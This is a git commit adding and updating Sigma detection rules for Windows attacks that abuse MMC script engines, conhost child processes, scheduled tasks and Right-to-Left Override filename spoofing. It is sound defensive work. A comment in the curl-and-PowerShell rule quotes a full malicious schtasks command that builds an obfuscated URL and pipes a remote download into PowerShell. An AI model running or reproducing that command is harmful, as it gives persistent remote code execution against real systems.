Merge PR #5183 from @swachchhanda000 - add rules for malware abusing grimresource and RTLO techniques

new: MMC Loading Script Engines DLLs new: Potentially Suspicious Child Processes Spawned by ConHost new: Scheduled Task Creation Masquerading as System Processes new: Schtasks Curl Download and Powershell Execution Combination new: MMC Executing Files with Reversed Extensions Using RTLO Abuse update: Potential Defense Evasion Via Right-to-Left Override - add `[U+202E]` update: Potential File Extension Spoofing Using Right-to-Left Override - add `[U+202E]` and more extensions --------- Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
2025-10-01 18:01:23 +05:45
parent cda3c76e41
commit d27d120401
8 changed files with 230 additions and 9 deletions
@@ -9,8 +9,11 @@ description: |
 references:
    - https://redcanary.com/blog/right-to-left-override/
    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
-author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems)
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
+author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
 date: 2024-11-17
+modified: 2025-02-06
 tags:
    - attack.execution
    - attack.defense-evasion
@@ -20,14 +23,30 @@ logsource:
    product: windows
 detection:
    selection_rtlo_unicode:
-        TargetFilename|contains: '\u202e'
+        TargetFilename|contains:
+            - '\u202e'  # Unicode RTLO character
+            - '[U+202E]'
    selection_extensions:
        TargetFilename|contains:
-            - 'fpd..'
-            - 'nls..'
-            - 'vsc..'
-            - 'xcod.'
-            - 'xslx.'
+            - '3pm.'  # Reversed `.mp3`
+            - '4pm.'  # Reversed `.mp4`
+            - 'cod.'  # Reversed `.doc`
+            - 'fdp.'  # Reversed `.pdf`
+            - 'ftr.'  # Reversed `.rtf`
+            - 'gepj.'  # Reversed `.jpeg`
+            - 'gnp.'  # Reversed `.png`
+            - 'gpj.'  # Reversed `.jpg`
+            - 'ism.'  # Reversed `.msi`
+            - 'lmth.'  # Reversed `.html`
+            - 'nls.' # Reversed `.sln`
+            - 'piz.'  # Reversed `.zip`
+            - 'slx.'  # Reversed `.xls`
+            - 'tdo.'  # Reversed `.odt`
+            - 'vsc.'  # Reversed `.csv`
+            - 'vwm.'  # Reversed `.wmv`
+            - 'xcod.'  # Reversed `.docx`
+            - 'xslx.'  # Reversed `.xlsx`
+            - 'xtpp.'  # Reversed `.pptx`
    condition: all of selection_*
 falsepositives:
    - Filenames that contains scriptures such as arabic or hebrew might make use of this character
@@ -0,0 +1,30 @@
+title: MMC Loading Script Engines DLLs
+id: a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad
+status: experimental
+description: |
+    Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+    to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+references:
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+    - https://www.elastic.co/security-labs/grimresource
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+    - attack.execution
+    - attack.defense-evasion
+    - attack.t1059.005
+    - attack.t1218.014
+logsource:
+    category: image_load
+    product: windows
+detection:
+    selection:
+        Image|endswith: '\mmc.exe'
+        ImageLoaded|endswith:
+            - '\vbscript.dll'
+            - '\jscript.dll'
+            - '\jscript9.dll'
+    condition: selection
+falsepositives:
+    - Legitimate MMC operations or extensions loading these libraries
+level: medium
@@ -1,5 +1,8 @@
 title: Uncommon Child Process Of Conhost.EXE
 id: 7dc2dedd-7603-461a-bc13-15803d132355
+related:
+    - id: dfa03a09-8b92-4d83-8e74-f72839b1c407
+      type: similar
 status: test
 description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
 references:
@@ -0,0 +1,44 @@
+title: Potentially Suspicious Child Processes Spawned by ConHost
+id: dfa03a09-8b92-4d83-8e74-f72839b1c407
+related:
+    - id: 7dc2dedd-7603-461a-bc13-15803d132355
+      type: similar
+status: experimental
+description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+references:
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+    - attack.t1202
+    - attack.defense-evasion
+    - attack.t1218
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_parent:
+        ParentImage|endswith: '\conhost.exe'
+    selection_child:
+        - Image|endswith:
+              - '\cmd.exe'             # Windows Command Prompt
+              - '\cscript.exe'         # Windows Script Host (used for scripting exploits)
+              - '\mshta.exe'           # MSHTA (HTML Application Host, often abused)
+              - '\powershell_ise.exe'  # PowerShell ISE
+              - '\powershell.exe'      # Windows PowerShell
+              - '\pwsh.exe'            # PowerShell Core
+              - '\regsvr32.exe'        # Windows Registry Server (commonly used for exploits)
+              - '\wscript.exe'         # Windows Script Host (for executing scripts)
+        - OriginalFileName:
+              - 'cmd.exe'
+              - 'cscript.exe'
+              - 'mshta.exe'
+              - 'powershell_ise.exe'
+              - 'powershell.exe'
+              - 'pwsh.dll'
+              - 'regsvr32.exe'
+              - 'wscript.exe'
+    condition: all of selection_*
+falsepositives:
+    - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+level: high
@@ -0,0 +1,39 @@
+title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
+status: experimental
+description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+references:
+    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
+    - https://en.wikipedia.org/wiki/Right-to-left_override
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+    - attack.execution
+    - attack.t1204.002
+    - attack.defense-evasion
+    - attack.t1218.014
+    - attack.t1036.002
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_image:
+        - Image|endswith: '\mmc.exe'
+        - OriginalFileName: 'MMC.exe'
+    selection_commandline:
+        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
+            - 'cod.msc'  # Reversed `.doc`
+            - 'fdp.msc'  # Reversed `.pdf`
+            - 'ftr.msc'  # Reversed `.rtf`
+            - 'lmth.msc'  # Reversed `.html`
+            - 'slx.msc'  # Reversed `.xls`
+            - 'tdo.msc'  # Reversed `.odt`
+            - 'xcod.msc'  # Reversed `.docx`
+            - 'xslx.msc'  # Reversed `.xlsx`
+            - 'xtpp.msc'  # Reversed `.pptx`
+    condition: all of selection_*
+falsepositives:
+    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+    - Unconventional but non-malicious usage of RLO or reversed extensions.
+level: high
@@ -0,0 +1,37 @@
+title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
+status: experimental
+description: |
+    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+references:
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+    - attack.persistence
+    - attack.t1053.005
+    - attack.defense-evasion
+    - attack.t1218
+    - attack.command-and-control
+    - attack.t1105
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
+    selection_img:
+        Image|endswith: '\schtasks.exe'
+        CommandLine|contains|windash: ' /create '
+    selection_curl:
+        CommandLine|contains|all:
+            - 'curl '
+            - 'http'
+            - '-o'
+    selection_powershell:
+        CommandLine|contains: 'powershell'
+    condition: all of selection_*
+falsepositives:
+    - Legitimate use of schtasks for administrative purposes.
+    - Automation scripts combining curl and PowerShell in controlled environments.
+level: medium
@@ -0,0 +1,45 @@
+title: Scheduled Task Creation Masquerading as System Processes
+id: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab
+status: experimental
+description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+references:
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2025-02-05
+tags:
+    - attack.persistence
+    - attack.t1053.005
+    - attack.defense-evasion
+    - attack.t1036.004
+    - attack.t1036.005
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_img:
+        - Image|endswith: '\schtasks.exe'
+        - OriginalFileName: 'schtasks.exe'
+    selection_cli:
+        CommandLine|contains|windash: ' /create '
+        CommandLine|contains:
+            - ' audiodg'
+            - ' conhost'
+            - ' dwm.exe'
+            - ' explorer'
+            - ' lsass'
+            - ' lsm'
+            - ' mmc'
+            - ' msiexec'
+            - ' regsvr32'
+            - ' rundll32'
+            - ' services'
+            - ' spoolsv'
+            - ' svchost'
+            - ' taskeng'
+            - ' taskhost'
+            - ' wininit'
+            - ' winlogon'
+    condition: all of selection_*
+falsepositives:
+    - Legitimate system administration tasks scheduling trusted system processes.
+level: high
@@ -13,8 +13,10 @@ references:
    - https://redcanary.com/blog/right-to-left-override/
    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
    - https://unicode-explorer.com/c/202E
-author: Micah Babinski, @micahbabinski
+    - https://tria.ge/241015-l98snsyeje/behavioral2
+author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
 date: 2023-02-15
+modified: 2025-02-06
 tags:
    - attack.defense-evasion
    - attack.t1036.002
@@ -23,7 +25,9 @@ logsource:
    product: windows
 detection:
    selection:
-        CommandLine|contains: "\u202e"
+        CommandLine|contains:
+            - '\u202e'  # Unicode RTLO character
+            - '[U+202E]'
    condition: selection
 falsepositives:
    - Commandlines that contains scriptures such as arabic or hebrew might make use of this character